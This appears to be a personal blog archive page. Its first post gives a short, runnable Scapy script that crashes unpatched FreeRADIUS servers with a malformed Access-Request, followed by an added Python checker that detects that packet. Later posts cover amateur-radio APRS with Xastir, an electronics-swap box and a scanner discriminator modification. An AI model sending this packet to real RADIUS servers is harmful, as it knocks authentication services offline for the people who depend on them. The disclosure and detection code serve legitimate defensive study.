Category Archives: What?!

Freeradius Packet of Death

I haven’t had a chance to use Scapy in a little while, and I hardly spend any time in Python (I don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6-capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest, as I’m currently experiencing _something_ that periodically knocks over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by software bugs in L2TP sequencing on the Telco router at the other end; their vendor has confirmed the problems).

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet; thankfully, one IS in their Trac.

So, download the layer to scapy/layers and ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP, UDP, send, Radius, RadiusAttr

if len(sys.argv) != 2:
    print("Usage: radius_killer.py <radiushost>\n")
    sys.exit(1)

# Access-Request (code=1) with a made-up 16-byte authenticator and a single
# attribute (type 69) whose length field of 2 leaves no room for a value.
PoD = IP(dst=sys.argv[1]) / UDP(sport=60422, dport=1812) / \
    Radius(code=1, authenticator="\x99" * 16, id=180) / \
    RadiusAttr(type=69, value="", len=2)

send(PoD)

(download)

Interestingly, one doesn’t need the shared secret to send the packet of death; as you can see, the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that doable. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust. Correct me if I’m wrong. Either way, updated packages are available.
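As an added defender-side example (not from the original post, and not FreeRADIUS code), here is a small pure-Python check that walks a RADIUS packet's attribute list and flags the malformed attribute the script above sends; the two sample packets are constructed inline, and the byte layout assumed is the RFC 2865 one (20-byte header, then type/length/value attributes). Because it inspects the wire format only, it needs no shared secret, which mirrors the point that the authenticator is irrelevant here.

```python
import struct

RADIUS_HEADER_LEN = 20  # code, id, length and the 16-byte authenticator
ACCESS_REQUEST = 1

# Constructed sample, not captured traffic: the Access-Request the script
# above builds, as raw bytes.  Header (code=1, id=180, length=22, sixteen
# 0x99 authenticator bytes) plus one attribute of type 69 whose length
# field of 2 leaves no room for a value.
POD_PACKET = (struct.pack("!BBH", ACCESS_REQUEST, 180, 22)
              + b"\x99" * 16 + bytes([69, 2]))

# A well-formed Access-Request carrying User-Name (type 1) "bob", for contrast.
GOOD_PACKET = (struct.pack("!BBH", ACCESS_REQUEST, 7, 25)
               + b"\x00" * 16 + bytes([1, 5]) + b"bob")

def check_radius(pkt):
    """Walk a RADIUS packet's attribute list and report malformed entries.

    Returns (attrs, problems): attrs is a list of (type, value) tuples and
    problems a list of strings.  No shared secret is needed, because the
    checks run on the wire format before any authentication happens.
    """
    attrs, problems = [], []
    if len(pkt) < RADIUS_HEADER_LEN:
        return attrs, ["packet shorter than the 20-byte RADIUS header"]
    _code, _ident, length = struct.unpack("!BBH", pkt[:4])
    if length < RADIUS_HEADER_LEN or length > len(pkt):
        return attrs, ["declared length %d does not fit a %d-byte packet"
                       % (length, len(pkt))]
    pos = RADIUS_HEADER_LEN
    while pos < length:
        if length - pos < 2:
            problems.append("%d trailing byte(s) too short for an attribute" % (length - pos))
            break
        atype, alen = pkt[pos], pkt[pos + 1]
        if alen < 2 or pos + alen > length:
            # A length below 2, or one that overruns the packet, cannot be
            # stepped over safely, so stop rather than guess at the next one.
            problems.append("attribute type %d has invalid length %d"
                            % (atype, alen))
            break
        value = pkt[pos + 2:pos + alen]
        if not value:
            # len=2 is type and length only: an empty value, as in the PoD.
            problems.append("attribute type %d carries an empty value" % atype)
        attrs.append((atype, value))
        pos += alen
    return attrs, problems
```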

RIP Milw0rm

APRS using Xastir

A couple of months back, I finally took my Amateur Radio Technician exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copious amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amateur licenses, digesting everything that one can do w/ a radio these days.

One of the things that has interested me the most is APRS. Using Xastir, you can track mobile and static APRS stations in your area.

Xastir focused on Central Pennsylvania

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia to Tennessee to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe; if you’ve not played it – seriously, get it. I only wish American trains were equipped w/ APRS.)

The extremely fun and addictive OTTD

I’d purchased a Yaesu VX-7R from eBay for just under $290.00.

Yaesu VX-7R with a CT-91 cable attached.

With the amateur license in tow (KB3TCN), I decided I’d start sending out my own beacons. The problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from eBay (it splits a four-conductor 3.5mm plug out into a 3.5mm headphone plug and a 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, which I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for the TNC connection, it turns out the solution is fairly simple: two interfaces using isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro; I’ll post my modified schematics shortly… I actually wrote this post months ago).

The optimal voltage is 5 mV with 2 kΩ of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but my beacon has reportedly been seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is a PIC-based tracker for my car.)

Happy Birthday: The Great Internet Migratory Box Of Electronics Junk

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself on the list…

Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)

Adding a discriminator to a BC80XLT Scanner

Adding a discriminator to the Uniden Bearcat BC80xlt scanner isn’t an incredibly difficult task.

BC80xlt discriminator

Simply find pin 9 of the MC3361 chip and connect a 2.2 nF capacitor and a 10 kΩ resistor, with a short piece of wire running to a 3.5mm headphone jack. The capacitor connects to the radio shield, and that’s about it (I suggest you follow the steps in the guide linked above).

My BC80XLT

My BC80xlt is slightly different than the one in the pictures in the link above. In some ways, it’s closer to the BC60-xlt-2. The innards of my device include a main board connected to a daughterboard. The “down” side of the daughterboard has the chip, the “top” side has the shield. This requires one to route the discriminator wire around the daughterboard, avoiding accidental contact with anything. My soldering job is pathetic (I have no illusions about that). In my defense, I am using a rusty tip which doesn’t conduct very well, but beyond that I really have no excuse aside from not being that skillful. My big concern was damage to the MC3361 from the heat of the soldering iron. In fact, I later realized I was using a 30 Watt iron – not the specified 15 Watt. (D’oh!) Turning it back on yields no apparent difference, so hopefully all is well.

Connection to pin 9 (yes, I know..)
Connection to the shield (yes, I know..)

Here’s how the two separate parts of my scanner look:

The top and bottom, which connect together
The connection to the 3.5mm jack
The 3.5mm discriminator tap

I had to make a few additional modifications. First of all, I removed the former cap and resistor (seen above) and replaced them with a much better soldered joint (I practiced for a bit prior to doing so). The 3.5mm jack has one problem: when pushed in all the way, the male connector actually makes contact with the grounded shield (that’s bad). The shield doesn’t appear to get hot, so I’ve used a small piece of plastic to prevent that from happening. Now everything fits snugly, and this works great.